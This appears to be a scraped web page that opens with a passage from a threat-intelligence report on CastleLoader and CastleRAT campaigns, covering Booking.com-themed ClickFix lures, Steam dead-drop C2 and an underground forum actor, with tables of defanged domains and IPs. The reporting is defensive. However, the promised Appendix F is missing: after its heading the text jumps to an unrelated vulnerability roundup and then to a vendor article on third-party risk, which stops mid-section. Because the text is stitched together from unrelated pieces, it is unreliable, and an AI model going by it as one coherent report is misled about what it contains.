Suspected testing server due to the number of domains including the keywords “test” and “demo”
Table 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)
ASN Cluster Possibly Linked to Bearhost
Insikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341 (OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent malicious activity since their inception. According to researchers at DeepCode, these providers maintain strong links to the BEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated providers have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned entities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity and customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma, Rhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the assessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting financially motivated cyber operations.
Infrastructure Similarities with TAG-157 (RefBroker)
Insikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as RefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56, adjacent to 77[.]83[.]207[.]55, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and TAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At present, however, the exact relationship between TAG-157 and TAG-161 remains unclear.
Cluster 3: Booking.com Impersonation Activity
Cluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver to deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group has not identified any technical overlaps between Clusters 2 and 3 at this time.
Infrastructure Analysis
Insikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see Figure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that downloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly spawns new PowerShell processes to add Windows Defender exclusions for the eventual payload (update.exe) using a User Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are applied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain, programsbookss[.]com, resolved through a Steam Community profile. The use of Steam Community profiles allows attackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use Steam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of all observed Steam Community profiles and the various C2 domains observed on each is found in Appendix F.
Figure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)
At the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the Steam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close placement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It also suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A similar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains were hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and justnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.
Figure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)
When scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile token missing” error message (1, 2). Further pivoting from the domain boiksal[.]com uncovered a broader cluster of activity encompassing multiple additional domains and IP addresses, most of which appear to be used to impersonate Booking.com. The domains and associated IP addresses are detailed in Appendix G. Notably, while the domains commonly use Cloudflare name servers, many of the domains ultimately resolve to threat actor–controlled IP addresses.
Cluster 4: Malvertising and Fake Software
Cluster 4 has been active since at least April 2025 and remains operational at the time of analysis. This cluster employs malvertising and fake software installers, impersonating legitimate tools such as Zabbix and RVTools, to distribute CastleLoader and NetSupport RAT.
Based on Insik Group observations, the cluster has used CastleLoader C2 infrastructure hosted on domains including wereatwar[.]com. It has also deployed NetSupport RAT samples that communicate with C2 servers at IP addresses such as 37[.]230[.]62[.]235 and 84[.]200[.]81[.]32. Notably, the domain jshanoi[.]com resolved to these NetSupport-associated IP addresses during the period of activity.
The CastleLoader payloads are distributed through fake GitHub repositories and delivered as electronically signed MSI installers, often bearing Extended Validation (EV) certificates, similar to those observed in previous Bumblebee campaigns. These signed builds have been attributed to organizations including LLC KHD GROUP (issued by GlobalSign) and INTYNA EXIM PRIVATE LIMITED (issued by SSL.com), among others. Notably, “Sparja”, an Exploit Forum user discussed below and potentially linked to CastleLoader, has been active in discussions regarding EV certificates earlier this year.
Possible Connection to Exploit Forum User Sparja
Analysis of historical CastleLoader infrastructure identified one anomalous instance that may indicate a link to a threat actor named “Sparja”. A panel hosted on 94[.]159[.]113[.]123 and exposed on port 5050 diverged from established CastleLoader panel characteristics. While known CastleLoader administrative interfaces typically display the HTML title “Castle,” this instance returned the title “Sparja.” Review of the panel’s DOM file revealed that it referenced a CSS file with a filename identical to one observed in verified CastleLoader panels. While the overlap does not constitute a conclusive stylistic correlation, it can suggest potential code reuse or reliance on a shared panel template between CastleLoader and the “Sparja” interface. Insikt Group identified one other Sparja panel with the same HTML title on the IP address 94[.]159[.]113[.]32 (see Figure 22).
Figure 22:Sparja panel (top) and CastleLoader panel (bottom) (Source: Recorded Future)
Activity associated with the alias “Sparja” on the underground Exploit Forum provides additional context for possible connections. Obtained via proprietary means, Insikt Group assesses that Sparja is also active on the top-tier Russian-language forum XSS. Insikt Group bases this assessment on the user’s XSS activity, in which the user viewed similar topics related to malware loaders, EV certificates, and bypass software.
On December 22, 2024, Sparja authored a thread on Exploit Forum, looking to buy or rent a dropper (see Figure 23). In a documented dispute spanning from January to February 2025, Sparja engaged a user known as “ppro” to develop a “private solution, a dropper or loader for an executable file.” The dispute concluded with ppro’s ban from the forum, following a history of earlier account suspensions and reinstatements. Given the timeline of the events, Insikt Group assesses it is unlikely ppr0 had involvement in CastleLoader’s development; however, Sparja’s expressed interest in acquiring a custom loader prior to CastleLoader’s appearance supports the assessment that Sparja was actively pursuing a dropper or loader functionality consistent with CastleLoader’s purpose.
Figure 23:Sparja in search of a dropper or loader on Exploit Forum (Source: Recorded Future)
Forum discussions in October 2025 indicate continued interest in Sparja’s apparent tooling (see Figure 24). A subsequent post sought contact with “the coder who wrote the Sparja dropper,” implying that a distinct dropper associated with Sparja had circulated within the underground market. This activity’s timeline aligns with CastleLoader operations and suggests that Sparja’s development or procurement of loader-type malware was known among peers during the same operational period.
Figure 24:Exploit Forum user “tomri99le” looking for the coder that worked with Sparja (Source: Recorded Future)
A related CastleLoader sample, distributed as an MSI installer, was identified in Bazaar Abuse data as originating from the GitHub account github[.]com/legend123451111. The same account appears in a Cisco Talos report describing a malware-as-a-service (MaaS) ecosystem leveraging GitHub for payload distribution, including malware families such as Amadey and Emmenhtal. Talos noted consistent naming conventions, repository structures, and file types across multiple associated GitHub accounts, with the earliest activity dated to January 2025. The report concluded that the operators of these accounts likely facilitated multi-tenant malware distribution rather than single-threat actor campaigns.
The available evidence does not confirm that Sparja directly participated in the MaaS network described by Talos; however, the CastleLoader sample that originated from github[.]com/legend1234561111, which contained the MSI installer, is linked to the Sparja-named CastleLoader panel, indicating a potential overlap between the GitHub-based distribution channel and infrastructure associated with Sparja. This connection suggests that Sparja may have either used an existing MaaS framework to distribute CastleLoader payloads or operated within the same delivery ecosystem.
On October 27, 2025, Sparja posted a comment on Exploit Forum within a thread advertising eDragon_x’s dropper service, stating that they had been using the service for several months and considered the dropper reliable. This post is notable as it reinforces Sparja’s continued interest in droppers and loaders, a recurring theme in their activity. The post also situates Sparja in proximity to eDragon_x, a threat actor operating within overlapping underground circles that include “tramp”, a known threat actor reportedly identified as Oleg Nefedov. Tramp is associated with a spamming network responsible for distributing Qbot (aka Qakbot) and is identified as the founder of the BlackBasta ransomware group. Tramp was also an affiliate for several ransomware operations, such as REvil and Conti; he also maintained close ties with Rhysida and Cactus.
While there is no direct evidence of collaboration between Sparja and tramp, the shared participation across related forums and service providers like eDragon_x suggests that Sparja operates within a network of threat actors closely associated with major ransomware distribution and loader development ecosystems.
Victimology
Insikt Group identified numerous suspected victim IP addresses communicating with the Tier 1 C2 infrastructure associated with CastleRAT. While the majority of these IP addresses appear to be geolocated in the United States, only a limited number of actual victims could be positively identified. Most victims remain unidentified and cannot be confirmed; however, Insikt Group assesses it is likely that at least some of them represent private individuals who became infected. It is important to note that of the entities Insikt Group identified, the infection might have occurred on individual machines within the network of the victim organization or by using the victim’s WiFi rather than on the organization's network directly. For instance, within the university context, it is likely that some victims are individual machines, such as those used by students, connected to the university's network.
Mitigations
Leverage the IoCs in Appendix H to investigate potential past or ongoing infections, both successful and attempted, and use the Recorded Future Intelligence Cloud to monitor for future IoCs associated with GrayBravo (formerly tracked as TAG-150), TAG-160, TAG-161, and other threat actors.
Monitor for validated infrastructure associated with the malware families discussed in this report, including CastleLoader, CastleRAT, Matanbuchus, and numerous others identified and validated by Insikt Group, and integrate these indicators into relevant detection and monitoring systems.
Leverage Sigma, YARA, and Snort rules provided in Appendices I, J, K, L, M, N, and O in your SIEM or endpoint detection and response (EDR) tools to detect the presence or execution of CastleLoader, CastleRAT, and Matanbuchus. Additionally, use other detection rules available in the Recorded Future Intelligence Cloud.
Use Recorded Future Network Intelligence to detect instances of data exfiltration from your corporate infrastructure to known malicious infrastructure. This can be achieved by employing specific queries and filtering the results based on your assets.
Use the Recorded Future Intelligence Cloud to monitor GrayBravo, TAG-160, TAG-161, other threat actors, and the broader cybercriminal ecosystem, ensuring visibility into the latest tactics, techniques, and procedures (TTPs), preferred tools and services (for example, specific threat activity enablers [TAEs] used by threat actors), and emerging developments.
Use Recorded Future AI’s reporting feature to generate tailored reports on topics that matter to you. For example, if you want to stay informed about activities related to specific personas such as Sparja, you can receive regular AI-generated updates on this threat actor’s activity on Exploit Forum.
Outlook
As anticipated in earlier assessments, GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware. This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective. Given GrayBravo’s established history of developing and deploying custom malware families, it is highly likely the group will continue to release new tools and capabilities in the near term, further strengthening its position within the MaaS market.
Among observed activity clusters, TAG-160 stands out for its highly targeted campaigns against the logistics sector. The cluster demonstrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. This indicates an increasing sophistication among niche, sector-specific threat actors who maintain a low profile through minimal footprints and precise targeting.
Insikt Group will continue to closely monitor GrayBravo along with related threat actors, such as TAG-160 and TAG-161, to detect emerging threats and evaluate the group’s strategic direction within the broader cybercriminal ecosystem.
Appendix A: CastleLoader C2 Servers
Domain
IP Address
First Seen
icantseeyou[.]icu
80[.]77[.]25[.]239
2025-10-09
anotherproject[.]icu
45[.]11[.]183[.]165
2025-10-09
donttouchthisisuseless[.]icu
80[.]77[.]25[.]88
2025-10-09
oldspicenotsogood[.]shop
45[.]155[.]249[.]121
2025-09-22
doyoureallyseeme[.]icu
45[.]11[.]183[.]19
2025-10-31
touchmeplease[.]icu
45[.]11[.]183[.]45
2025-10-31
donttouchme[.]life
80[.]77[.]25[.]114
2025-10-31
wereatwar[.]com
172[.]86[.]90[.]58
2025-11-05
rcpeformse[.]com
147[.]45[.]177[.]127
2025-11-05
roject0[.]com
185[.]121[.]234[.]141
2025-11-03
bethschwier[.]com
170[.]130[.]165[.]201
2025-10-12
speatly[.]com
173[.]44[.]141[.]52
2025-11-06
campanyasoft[.]com
31[.]58[.]87[.]132
2025-10-02
alafair[.]net
107[.]158[.]128[.]26
2025-09-06
dpeformse[.]com
147[.]45[.]177[.]127
2025-10-29
castlppwnd[.]com
31[.]58[.]50[.]160
2025-11-05
(Source: Recorded Future)
Appendix B: Additional Infrastructure Likely Linked to CastleLoader
Domain
IP Address
albafood[.]shop
15[.]197[.]240[.]20
albalk[.]lol
15[.]197[.]240[.]20
bdeskthebest[.]shop
15[.]197[.]240[.]20
bestproxysale[.]shop
15[.]197[.]240[.]20
bestvpninfo[.]shop
15[.]197[.]240[.]20
chessinthenight[.]lol
15[.]197[.]240[.]20
clgenetics[.]shop
15[.]197[.]240[.]20
docusign[.]homes
15[.]197[.]240[.]20
dubaialbafood[.]shop
15[.]197[.]240[.]20
easyadvicesforyou[.]shop
15[.]197[.]240[.]20
easyprintscreen[.]shop
15[.]197[.]240[.]20
funjobcollins[.]shop
31[.]214[.]157[.]77
nort-secure[.]shop
15[.]197[.]240[.]20
norton-secure[.]shop
15[.]197[.]240[.]20
notstablecoin[.]xyz
15[.]197[.]240[.]20
notusdt[.]lol
15[.]197[.]240[.]20
nvidblog[.]shop
15[.]197[.]240[.]20
nvldlainfoblog[.]shop
15[.]197[.]240[.]20
oldspicenotsogood[.]shop
45[.]155[.]249[.]121
starkforeveryone[.]lol
15[.]197[.]240[.]20
sweetdevices[.]lol
15[.]197[.]240[.]20
testdomain123123[.]shop
15[.]197[.]240[.]20
tradeviewdesktop[.]shop
15[.]197[.]240[.]20
tradlngview-desktop[.]biz
15[.]197[.]240[.]20
tradlngvlewdesktop[.]shop
15[.]197[.]240[.]20
tradview-desktop[.]shop
15[.]197[.]240[.]20
vipcinemade[.]shop
15[.]197[.]240[.]20
vipcinemadubai[.]shop
15[.]197[.]240[.]20
vipdubaicinema[.]shop
15[.]197[.]240[.]20
(Source: Recorded Future)
Appendix C: Logistics-Themed Infrastructure Used by TAG-160
Domain
IP Address
First Seen
Last Seen
loadsschedule[.]com
199[.]79[.]62[.]141
2025-08-04
2025-11-09
loadstracking[.]com
Cloudflare
2025-09-19
2025-11-09
loadstrucking[.]com
162[.]251[.]80[.]108
2025-05-18
2025-09-10
rateconfirmations[.]com
162[.]215[.]230[.]150
2025-09-11
2025-11-09
cdlfreightlogistics[.]com
N/A
N/A
N/A
dperforms[.]info
78[.]153[.]155[.]131
2025-10-01
2025-11-09
englandloglstics[.]com
N/A
N/A
N/A
englanglogistlcs[.]com
N/A
N/A
N/A
loadstracking[.]com
207[.]174[.]212[.]141
2025-06-27
N/A
hometownlogisticsllc[.]com
N/A
N/A
N/A
leemanlogisticsinc[.]com
N/A
N/A
N/A
loadplannig[.]com
204[.]11[.]58[.]80
2025-07-27
2025-11-09
loads[.]icu
185[.]236[.]20[.]154
2025-09-17
2025-11-10
loadsplanning[.]com
192[.]124[.]178[.]74
2025-07-26
2025-07-26
loadsschedule[.]com
199[.]79[.]62[.]141
2025-08-04
2025-11-09
loadstracking[.]com
207[.]174[.]212[.]141
2025-06-28
2025-07-03
loadstrucking[.]com
162[.]251[.]80[.]108
2025-05-18
2025-09-10
mcentireinc[.]com
N/A
N/A
N/A
mcloads[.]com
74[.]119[.]239[.]234
2025-04-18
2025-05-15
mlxfreightinc[.]com
N/A
N/A
N/A
mrlogsol[.]ca
N/A
N/A
N/A
pinaccletruckllc[.]com
74[.]119[.]239[.]234
2025-04-12
2025-05-14
rateconfirmations[.]com
162[.]215[.]230[.]150
2025-09-11
2025-11-09
redlightninglogistics[.]com
Cloudflare
2025-03-21
2025-11-10
redlightninglogisticsinc[.]com
74[.]119[.]239[.]234
2025-04-19
2025-05-13
starshiplogisticsgroupllc[.]com
N/A
N/A
N/A
tenderloads[.]com
162[.]215[.]241[.]215
2025-10-24
2025-11-09
162[.]215[.]241[.]46
2025-09-11
2025-10-23
trucksscheduling[.]com
162[.]215[.]230[.]96
2025-08-18
2025-11-10
(Source: Recorded Future)
Appendix D: Booking.com-Themed Domains Linked to TAG-161
Domain
IP Address
First Seen
Last Seen
checkinastayverify[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-22
checkinistayverify[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-17
checkinstayverify[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-22
checkistayverify[.]com
185[.]39[.]19[.]180
2025-07-31
2025-10-22
checksstayverify[.]com
185[.]39[.]19[.]180
2025-07-31
2025-10-23
checkystayverify[.]com
185[.]39[.]19[.]180
2025-07-31
2025-10-22
confirmahotelastay[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-21
confirmahotelstay[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-23
confirmhotelestay[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-22
confirmhotelistay[.]com
185[.]39[.]19[.]181
2025-08-01
2025-10-16
confirmhotelystay[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-23
confirmstayon[.]com
185[.]39[.]19[.]181
2025-07-29
2025-10-22
confirmstayonline[.]com
185[.]39[.]19[.]181
2025-07-29
2025-10-20
confirmyhotelstay[.]com
185[.]39[.]19[.]181
2025-08-01
2025-10-22
guestaformahub[.]com
185[.]39[.]19[.]180
2025-07-30
2025-10-22
guestaformhub[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-22
guestaformsafe[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-22
guestaportalverify[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-22
guestaverifyportal[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-20
guestformahub[.]com
185[.]39[.]19[.]180
2025-07-30
2025-10-23
guestformasafe[.]com
185[.]39[.]19[.]180
2025-07-30
2025-10-21
guestformhub[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-20
guestformsafe[.]com
77[.]83[.]207[.]55
2025-07-28
2025-11-03
185[.]39[.]19[.]180
N/A
N/A
guestistayhotel[.]com
185[.]39[.]19[.]180
2025-08-02
2025-10-21
guestportalverify[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-23
gueststayhotel[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-22
guestverifyhub[.]com
185[.]39[.]19[.]181
2025-07-28
2025-10-22
guestverifylink[.]com
185[.]39[.]19[.]180
2025-07-28
2025-10-23
guestverifyportal[.]com
185[.]39[.]19[.]181
2025-07-30
2025-10-22
guestystayhotel[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-22
guesutastayhotel[.]com
185[.]39[.]19[.]180
2025-08-01
2025-10-21
guesytastayhotel[.]com
185[.]39[.]19[.]180
2025-08-02
2025-10-22
hoteliguestverify[.]com
185[.]39[.]19[.]180
2025-07-31
2025-10-21
hotelistayverify[.]com
185[.]39[.]19[.]180
2025-07-31
2025-10-21
hotelyguestverify[.]com
185[.]39[.]19[.]181
2025-07-31
2025-10-22
hotelystayverify[.]com
185[.]39[.]19[.]181
2025-07-31
2025-10-23
nedpihotel[.]com
185[.]39[.]19[.]181
2025-07-29
2025-10-22
pilolhotel[.]com
185[.]39[.]19[.]180
2025-07-29
2025-10-22
roomiverifaccess[.]com
185[.]39[.]19[.]181
2025-08-02
2025-10-22
roomverifaccess[.]com
185[.]39[.]19[.]181
2025-08-03
2025-10-23
roomverifiaccess[.]com
185[.]39[.]19[.]181
2025-08-02
2025-10-22
servicehotelonline[.]com
185[.]39[.]19[.]180
2025-08-03
2025-10-21
verifihubguest[.]com
185[.]39[.]19[.]180
2025-07-28
2025-10-22
verifyhubguest[.]com
185[.]39[.]19[.]181
2025-07-28
2025-10-22
(Source: Recorded Future)
Appendix E: Additional Infrastructure Linked to “Redirect and Email Manager” Tool
Domain
IP Address
First Seen
Last Seen
Notes
dok-ol[.]com
185[.]39[.]19[.]180
2025-07-27
2025-07-28
N/A
185[.]39[.]19[.]181
2025-07-28
2025-11-10
cik-ed[.]com
185[.]39[.]19[.]181
2025-07-28
2025-11-09
N/A
for-es[.]com
77[.]83[.]207[.]55
2025-07-25
2025-11-03
Found via Google
kil-it[.]com
185[.]39[.]19[.]180
2025-06-29
2025-11-07
Found via Google
kip-er[.]com
77[.]83[.]207[.]55
2025-07-11
2025-11-09
Found via Google
xut-uv[.]com
77[.]83[.]207[.]55
2025-07-20
2025-11-08
Found via Google
eta-cd[.]com
185[.]39[.]19[.]180
2025-07-22
2025-11-08
Found via Google
uki-fa[.]com
77[.]83[.]207[.]55
2025-07-22
2025-11-07
Found via Google
ned-uj[.]com
185[.]39[.]19[.]180
2025-07-10
2025-11-05
Found via Google
eto-sa[.]com
77[.]83[.]207[.]55
2025-06-25
2025-11-09
Found via Google
wal-ik[.]com
77[.]83[.]207[.]55
2025-07-10
2025-11-09
Found via Google
mac-ig[.]com
77[.]83[.]207[.]55
2025-07-20
2025-11-09
Found via Google
map-nv[.]com
77[.]83[.]207[.]55
2025-07-11
2025-11-06
Found via Google
ipk-sa[.]com
77[.]83[.]207[.]55
2025-07-18
2025-11-06
Found via Google
her-op[.]com
185[.]39[.]19[.]180
2025-06-24
2025-06-24
Domain used in “Completed processing task” log, per the DOM
77[.]83[.]207[.]55
2025-06-25
2025-06-25
(Source: Recorded Future)
Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains
November 2025 saw a significant 69% decrease in high-impact vulnerabilities, with Recorded Future's Insikt Group® identifying 10 vulnerabilities requiring immediate attention, down from 32 in October.
What security teams need to know:
Fortinet leads concerns: Two critical FortiWeb vulnerabilities (CVE-2025-64446 and CVE-2025-58034) are under active exploitation
Public exploits proliferate: Seven of ten vulnerabilities have public proof-of-concept code available
OS Command Injection and Out-of-bounds Write were tied as the most common weakness types
Bottom line: The reduced volume shouldn't signal reduced vigilance. November's vulnerabilities demonstrate that threat actors favored quality over quantity in their exploitation campaigns.
Quick Reference: November 2025 Vulnerability Table
All 10 vulnerabilities below were actively exploited in November 2025.
Why this matters: Unauthenticated attackers can bypass authentication entirely and create administrative accounts. With 4,768 exposed FortiWeb instances globally, this represents a critical internet-facing risk.
Static vendor checks fall short: Traditional, point-in-time third-party risk management practices (e.g. annual questionnaires) leave organizations blind to emerging vendor threats between audits. Continuous monitoring is now a must.
Five common risk scenarios: Supply chain attacks, widespread software vulnerabilities, hidden fourth-party dependencies, vendor credential theft, and vendor instability each illustrate how “trusting” vendors can lead to breaches or business disruptions.
Intelligence-driven defense: Recorded Future’s platform provides real-time visibility into your vendor ecosystem—from dark web credential leaks to fourth-party relationships—enabling proactive mitigation before incidents impact your organization.
From trust to verification: The solution is to move from static trust to continuous verification. By continuously assessing vendors’ cyber and business health (and even integrating intelligence into workflows like ServiceNow), security leaders can vastly strengthen their vendor risk management framework.
Your Vendor Ecosystem Is a Black Box: It’s Time to Turn on the Lights
For CISOs and risk leaders, the attack surface now goes far beyond the footprint of the business. It’s a sprawling web of SaaS vendors, software suppliers, MSPs, payment processors, logistics partners, and niche fourth parties your vendors rely on. Every connection expands risk—often outside direct visibility. In other words, your security may only be as strong as your weakest vendor or partner.
Traditional third-party risk management (TPRM)—static security questionnaires and annual audits—cannot keep pace. They describe what a vendor claimed their security looked like months ago, not what it is right now. Meanwhile, the most damaging events (supply chain attacks, zero-day exploitation, credential resale, concentration failures) unfold in hours and days, not quarters.
This gap between point-in-time paperwork and real-time risk is why third-party exposure has become a primary vector for catastrophic breaches and business outages.
This article will highlight and analyze 5 real-world third-party risk examples. For each, we'll show why traditional methods fail and how continuous, real-time third-party risk management and threat intelligence is the only effective prevention.
5 Third-Party Risk Examples and How to Prevent Them
Modern vendor risk comes in many forms. Let’s explore five common scenarios—and how proactive measures can stop them:
Type 1: The Software Supply Chain Attack
The Scenario: One of the most damaging third-party risks is a software supply chain attack. This occurs when threat actors breach a trusted software vendor’s development environment and secretly inject malicious code into a legitimate, digitally signed software update. The tainted update, a “Trojan horse,” is then distributed to the vendor’s customers, giving the attacker access into thousands of networks at once.
Real-World Example:The SolarWinds Orion breach is a quintessential case. In 2020, nation-state hackers compromised SolarWinds’ build pipeline and inserted malware into an Orion software update. The malicious update, being validly signed, was pushed to around 18,000 customers, including numerous government agencies and Fortune 500 companies, who all gladly installed it, thereby granting the attackers insider access to their systems.
Why Traditional Methods Fail: A standard vendor security questionnaire or audit would never have caught this. SolarWinds had passed assessments and appeared reputable. The update itself was digitally signed and appeared “trusted” to antivirus scanners and other controls. In short, you cannot audit your way out of a risk that’s been inserted into a trusted product’s software supply chain.
The Intelligence-Led Solution: Preventing a supply chain attack means detecting subtle warning signs before the breach fully unfolds. Recorded Future’s platform continuously monitors for early indicators tied to your vendors. If threat actors known for targeting CI/CD pipelines start discussing or probing one of your software vendors, you’d know. If intelligence suggests a vendor’s code-signing certificate may be compromised, you’d get an alert. Armed with this foresight, you could elevate that vendor’s risk status, scrutinize their software updates more closely, and even hunt for indicators of compromise in your environment before the breach becomes public knowledge.
Type 2: The Widespread Third-Party Vulnerability
The Scenario: A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.
Real-World Example: The MOVEit Transfer zero-day (exploited by the Cl0p ransomware group) and the Log4j “Log4Shell” vulnerability are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.
Why Traditional Methods Fail: This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.
The Intelligence-Led Solution: Defending against widespread vulnerabilities requires connecting two dots instantly: what’s vulnerable and who in your supply chain is using it. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, Recorded Future’s intelligence automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”
Type 3: The Fourth-Party & Concentration Risk
The Scenario: Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.
Real-World Example: The 2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.
Why Traditional Methods Fail: If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.
The Intelligence-Led Solution: The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.
Type 4: The Vendor Credential Compromise
The Scenario: Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.
Real-World Example: This tactic was at the heart of the high-profile 2023 breaches of MGM Resorts and Caesars Entertainment, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.
Why Traditional Methods Fail: A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.
The Intelligence-Led Solution: The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.
Type 5: The Operational & Financial Instability Risk
The Scenario: Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.
Real-World Example: A headline-grabbing case occurred with the sudden collapse of Silicon Valley Bank (SVB) in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.
